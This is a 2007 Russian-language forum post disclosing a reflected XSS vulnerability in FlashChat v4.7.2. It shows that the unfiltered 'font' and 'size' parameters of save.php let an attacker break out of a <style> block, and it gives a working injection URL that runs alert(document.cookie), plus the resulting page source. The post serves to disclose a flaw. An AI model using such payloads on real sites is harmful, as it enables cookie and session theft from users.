FlashChat v 4.7.2

FlashChat v 4.7.2

02.02.2007, 01:10

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

С нами: 10487223

Репутация: 490

FlashChat v 4.7.2

Пришлось мне потеститьFlashChat v 4.7.2
Сам движок написан неплохо, все входящие символы в окно чата фильтруються.

В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида

Цитата:

save.php?id=895a28e67c9b1533b0c0786b7a0706ce&font=Arial&size=13

По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс

Код:

	
<style type="text/css">
<!--
BODY {
	font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
	font-size: 13px;
}
-->
</style>

Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
Вот xss:

Цитата:

save.php?font=Arial&size=13px;}--></style><script>alert(document.cookie)</script><!--

Теперь иходный код примет такой вид

Код:

	
<style type="text/css">
<!--
BODY {
	font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
	font-size: 13px;}--></style><script>alert(document.cookie)</script><!--
}
-->
</style>

А вот и куки =)
html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте

𝕏 Twitter Reddit Telegram Копировать ссылку